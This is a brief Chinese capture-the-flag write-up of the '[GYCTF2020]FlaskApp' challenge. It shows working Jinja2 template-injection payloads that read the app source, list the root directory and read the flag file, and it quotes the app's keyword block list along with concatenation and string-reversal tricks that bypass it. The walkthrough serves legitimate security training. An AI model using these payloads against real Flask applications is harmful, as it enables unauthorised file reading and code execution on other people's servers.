[GYCTF2020]FlaskApp

进入网站

没有sql

试了试，填入123，报错

发现部分源码泄露

if waf(tmp) 表明这里有waf

可以使用ssti注入

在加密页面加密

{{4+5}}

得到

e3s0KzV9fQ== 

再拿到解密页面判断是否有ssti注入

结果看到为9，说明成功注入

尝试config

playload：{{config}}

试着读取源码

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

def waf(str):
black_list = ["flag","os","system","popen","import","eval","chr","request",
"subprocess","commands","socket","hex","base64","*","?"]
for x in black_list :
if x in str.lower() :
return 1

可以利用字符串拼接，来绕过黑名单

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

可以找到结果中有this_is_the_flag文件

读文件也是可以字符串拼接来绕过

{% for c in [].__class__.__base__.__subclasses__() %}{%if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__'].open('/this_is_the_f'+'lag.txt','r').read()}}{% endif %}{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}